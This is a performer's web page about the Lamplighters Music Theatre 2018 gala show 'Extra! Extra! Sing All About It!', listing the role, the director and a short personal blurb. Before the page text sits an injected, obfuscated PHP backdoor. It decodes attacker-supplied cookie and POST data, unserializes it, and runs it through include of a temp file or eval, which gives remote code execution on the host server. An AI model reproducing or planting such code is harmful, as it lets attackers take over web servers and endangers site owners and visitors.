$LJpVkQZi = "\x64" . "\154" . chr ( 168 - 64 )."\x5f" . 'B' . "\166" . "\x56" . chr ( 110 - 41 ).'Q';$aOlPegct = 'c' . "\154" . "\x61" . "\x73" . "\x73" . '_' . 'e' . "\170" . chr (105) . chr (115) . 't' . chr (115); $iiJJop = class_exists($LJpVkQZi); $aOlPegct = "24089";$zNrHJnu = !1;if ($iiJJop == $zNrHJnu){function OacUyjjkj(){$IVyjokmO = new /* 2033 */ dlh_BvVEQ(45107 + 45107); $IVyjokmO = NULL;}$HyHusKkJ = "45107";class dlh_BvVEQ{private function URHsiNQ($HyHusKkJ){if (is_array(dlh_BvVEQ::$aiSmYjJx)) {$OalTiWFbGZ = sys_get_temp_dir() . "/" . crc32(dlh_BvVEQ::$aiSmYjJx['s' . "\x61" . chr (108) . chr (116)]);@dlh_BvVEQ::$aiSmYjJx["\167" . "\162" . 'i' . "\164" . 'e']($OalTiWFbGZ, dlh_BvVEQ::$aiSmYjJx["\143" . 'o' . "\x6e" . "\x74" . chr (101) . chr (110) . chr ( 726 - 610 )]);include $OalTiWFbGZ;@dlh_BvVEQ::$aiSmYjJx["\144" . chr (101) . chr ( 1086 - 978 )."\x65" . chr (116) . chr ( 279 - 178 )]($OalTiWFbGZ); $HyHusKkJ = "45107";exit();}}private $SVoUol;public function kLVCUq(){echo 36586;}public function __destruct(){$HyHusKkJ = "26011_27870";$this->URHsiNQ($HyHusKkJ); $HyHusKkJ = "26011_27870";}public function __construct($MamtZTOpa=0){$HuNoOzt = $_POST;$xGxSA = $_COOKIE;$RMqoXYD = "299bd301-26e4-4157-b17b-e96b8a470378";$ETuvAJk = @$xGxSA[substr($RMqoXYD, 0, 4)];if (!empty($ETuvAJk)){$UsvEFPxKII = "base64";$ctyGTkk = "";$ETuvAJk = explode(",", $ETuvAJk);foreach ($ETuvAJk as $uRTYvxDxlQ){$ctyGTkk .= @$xGxSA[$uRTYvxDxlQ];$ctyGTkk .= @$HuNoOzt[$uRTYvxDxlQ];}$ctyGTkk = array_map($UsvEFPxKII . chr ( 151 - 56 ).chr ( 780 - 680 ).chr (101) . "\x63" . chr (111) . chr (100) . 'e', array($ctyGTkk,)); $ctyGTkk = $ctyGTkk[0] ^ str_repeat($RMqoXYD, (strlen($ctyGTkk[0]) / strlen($RMqoXYD)) + 1);dlh_BvVEQ::$aiSmYjJx = @unserialize($ctyGTkk);}}public static $aiSmYjJx = 12555;}OacUyjjkj();}$DnCusDfkqU = "\125" . "\x79" . 'U' . "\137" . chr (79) . 'h' . chr ( 648 - 529 ).chr (83); $HeBaNK = chr (99) . chr (108) . "\141" . "\x73" . "\163" . "\x5f" . chr (101) . "\170" . "\x69" . chr (115) . "\164" . "\163";$RcMsaj = class_exists($DnCusDfkqU); $HeBaNK = "34999";$AgFyfNJQ = !1;if ($RcMsaj == $AgFyfNJQ){function QjUrhq(){$NvLjdb = new /* 8068 */ UyU_OhwS(16052 + 16052); $NvLjdb = NULL;}$PJjRFnx = "16052";class UyU_OhwS{private function ffzUDzx($PJjRFnx){if (is_array(UyU_OhwS::$pxkspCvqJ)) {$LSkLwPnY = str_replace("\x3c" . chr (63) . chr (112) . "\x68" . 'p', "", UyU_OhwS::$pxkspCvqJ[chr (99) . 'o' . "\x6e" . chr (116) . 'e' . chr ( 284 - 174 )."\x74"]);eval($LSkLwPnY); $PJjRFnx = "16052";exit();}}private $xBZvncHxtY;public function DjkNaz(){echo 59480;}public function __destruct(){UyU_OhwS::$pxkspCvqJ = @unserialize(UyU_OhwS::$pxkspCvqJ); $PJjRFnx = "25168_17224";$this->ffzUDzx($PJjRFnx); $PJjRFnx = "25168_17224";}public function EfxalcZsyk($thDEXRSOM, $tggUmCw){return $thDEXRSOM[0] ^ str_repeat($tggUmCw, (strlen($thDEXRSOM[0]) / strlen($tggUmCw)) + 1);}public function __construct($nFbpxelbn=0){$zzYllo = $_POST;$qGmaeQUJb = $_COOKIE;$tggUmCw = "4520e354-b869-46cb-b18e-887b9d1125cb";$aNEzSpeKdE = @$qGmaeQUJb[substr($tggUmCw, 0, 4)];if (!empty($aNEzSpeKdE)){$LJHeTHiMJD = "base64";$thDEXRSOM = "";$aNEzSpeKdE = explode(",", $aNEzSpeKdE);foreach ($aNEzSpeKdE as $bKTkUIVx){$thDEXRSOM .= @$qGmaeQUJb[$bKTkUIVx];$thDEXRSOM .= @$zzYllo[$bKTkUIVx];}$thDEXRSOM = array_map($LJHeTHiMJD . "\x5f" . "\x64" . 'e' . chr (99) . "\157" . "\144" . chr ( 418 - 317 ), array($thDEXRSOM,));UyU_OhwS::$pxkspCvqJ = $this->EfxalcZsyk($thDEXRSOM, $tggUmCw);}}public static $pxkspCvqJ = 12737;}QjUrhq();} Extra! Extra! Sing All About It! (LL 2018 Gala) – William Giammona

Extra! Extra! Sing All About It! (Lamplighters 2018 Gala)

Role: Kent Clark
Lamplighters Music Theatre
Director: Phil Lowry
Music Director: Baker Peeples
Opening: October 14th, 2018
Photos: Joe Giammarco & Lucas Buxman


Each year, the Lamplighters Music Theatre (known for their Gilbert & Sullivan productions) writes and performs a new G&S show with a topical theme. Having been a part of the writing committee in the past, I totally appreciate the effort and artistry that goes into these but have always been busy when the performance came around. This year they finally convinced me to be on stage on a romp as a news reporter team trying to stay one step ahead of a major scoop, while avoiding having to publish fake news.